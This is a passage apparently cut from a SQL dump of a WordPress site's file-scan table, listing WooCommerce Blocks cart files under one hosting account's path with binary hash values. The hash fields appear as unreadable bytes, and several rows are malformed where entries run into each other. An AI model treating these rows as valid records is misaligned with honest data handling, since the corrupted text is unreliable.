4s\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-express-payment-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r (쾞!','',0,'?'),('3E4\rox','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vnGT$ɉ','e Ժfo?Z ? ','',0,'?'),('lo+#Ԥ5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r_95wJB','Wν #1+XźQ3)J','',0,'?'),('bnN{sx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uq[p@h3y',':3q뷮˹rш[- lm[L\'','',0,'?'),(' n*םbK ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-items-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I+ J/','F6me&Lk: \r\0+y?h\'(','',0,'?'),('gc-@ @','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a\Z+-?','euN7t\'O.\nz1nT|/\'','',0,'?'),('~D@=av:q_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'菏!lI-i\'','_G}C8ef\'PO\"\04)Z','',0,'?'),('l5~^}~7M','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' a3~','VWt`A`Pnx]ш;u','',0,'?'),('fwW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('M+wex#)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-line-items-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'e;oS9p','Dx5{sr2a','',0,'?'),('J8N$ΠP,ǬvY','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%pl6ffO[?.','>PhliH','',0,'?'),('\\sN=;_T','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('9_VQa\"yN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-coupon-form/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GVBs','\ZSV0Io<{2*ؽM|','',0,'?'),('U4 Rk rˬO','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E&SXB','IݟncV4Y*ᐢȿA% ӣGrx','',0,'?'),('uYMci','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*q&A ,',',e+(TFؾ) b-֮Ń̅,~','',0,'?'),('kkO%`qXX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ī[km8J(','lKьV4A{A^~2XE}','',0,'?'),(' GnThy','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('\r?OlNY֝&Y\ZG','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-discount/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \'/g20~/','dgkǣhY ނ7\r svnd6','',0,'?'),('C\"%Wiሞ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AH.1I-D','Qj\ntKOD=\r:\'\rI','',0,'?'),('8mɭe3o ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PDe5 /exU','zYx&:5.jES7i)ںO','',0,'?'),('0>lfEZoѽS','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ī[km8J(','lKьV4A{A^~2XE}','',0,'?'),('nKS@`\'J','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('<1$濍','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-fee/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kn,tGf','\\:0g:Ew˫ʎ','',0,'?'),('Np%ObE)r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(uN 6X;r','ȰJ3xKЩ2GoŋuMy\nw','',0,'?'),('-giǡI\'.DZ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z,֌^Gy',' ڽ&o섅ha4r:)23N?','',0,'?'),('!;b^؁D','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*h[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ^9x N7l','yhB/~\\Ǒt:','',0,'?'),('^@|eV˜Ĩ}H;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-heading/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V!{3r','oX$ZNEWa\0;\rr*]7','',0,'?'),('V [\\#O ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9\\qb{3(P{G',';ȵ[k|t- ~#uS','',0,'?'),('7H`s:>Cܯ~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I;)1qp+-','OlKs)I3!=ͨV_ǏvQ@','',0,'?'),('עP4e¡U`5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','אFOE%\r','\Z/E紺!&LS%`;0F !sv#','',0,'?'),(':hlr-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R{S^4m','˧`\n*gdJG\nX6ߖ','',0,'?'),('o1]Y^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ^9x N7l','yhB/~\\Ǒt:','',0,'?'),('uu[PiLj\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-shipping/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QV2ۄ[t 5','V\Z!vW-:!\\ޏ[D>ڇw','',0,'?'),('#t!Q?J','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\" O_\\9','1]=| \0R;#[\n#{ C@D','',0,'?'),('}=Yl&K','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ]kju}E2',',{(X|-ITq\\\Z( -','',0,'?'),('Zyp-L4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ī[km8J(','lKьV4A{A^~2XE}','',0,'?'),('_/Y\\S&)\\/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('k1:\r)0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-subtotal/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZS\\[`ƩyYlj*',' p\r_Èi]4,Ol','',0,'?'),(' ºugH','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' .,9R','L~oS{ZIOq\Z','',0,'?'),('mI G1o.^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',b2eP','BW}B?>Re|Oe|Le;<u','',0,'?'),('jAVX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ĒH10C4','∊pvdbD5R}/rJ','',0,'?'),('=һqp)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^aux%=','g8mɎL:G \0k̞wWr^','',0,'?'),('c8B:oβ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ^9x N7l','yhB/~\\Ǒt:','',0,'?'),('W ph\'C','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-order-summary-taxes/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YI>puI','d)T>\'PX%cNefXw','',0,'?'),('ͿGO}jHR<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+!2\ZӇ~JZ',':sҵ0h5~R\'1O^x{N','',0,'?'),('hET|J\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{`|oly/\'','+i?_ ?-IaŞztl;J','',0,'?'),(',rLn^ pxͲ$M','',0,'?'),(')\'Ͻ9N+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dqo뷘YĒ','!X=‹$;$Ү*!E\\k','',0,'?'),('4 쮾|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/cart-totals-block/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J蕙/h@^','Kɑ\"Fa%cq/L~^ ,^./>','',0,'?'),('tz߸cc','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/component-metadata.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/component-metadata.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G>a[G(_?.:','`C.Yż)MS͟*p0{]','',0,'?'),('u\\.<{wzX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4rb~mל','!tti߾.zޡ _(QA','',0,'?'),('GNJ~ı\"a','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\0~y_','G>w5,h3@*,jivq6','',0,'?'),('1I\\ *!b>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tHZ|YD','\Z5cQwnCY\rʺߪ(nU\\','',0,'?'),('jpB\0MxŐ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$svG8Xm,7!','y4R.DV~C{τN>G@b&#','',0,'?'),('{ {n,dя\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/empty-cart-block/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3DH\0cS^@','-\\7o77-JEnx\"扣`C','',0,'?'),('_GT5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߂]p7Q^6@*\Zu','R*IF!{W׮RQ\06','',0,'?'),('ug~tU','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^$P5.&y','Mss_pݜ$`64_6B','',0,'?'),('8~%>Q]~˰o','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/filled-cart-block/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M{klԣ\"=','7A%@Bbjl\0VZ\ZV','',0,'?'),('mF5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' )Eq ','ā7Acu,?B\0^ǐw.','',0,'?'),('zkF\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n%wlWl','xlnu Z4 .} De*ZM','',0,'?'),('HC٫a\Z>[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(T\06','MoM/[]]0ŲƜh','',0,'?'),('pm*E۱','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G[^7^ HT','\n,JL_YsMtGApr;\\=','',0,'?'),('eM`Fe\nƏ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/constants.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/constants.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mon~&}','+ʢjJ )J\0眙\0_#(o_','',0,'?'),(' r8{.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(:R5q~ ','$ 5wB$ܺlиq~B}','',0,'?'),('P/uW И5 I9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ^9x N7l','yhB/~\\Ǒt:','',0,'?'),('Z*2s~@P:t*','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/cart/inner-blocks/proceed-to-checkout-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x蚥MJ9',' 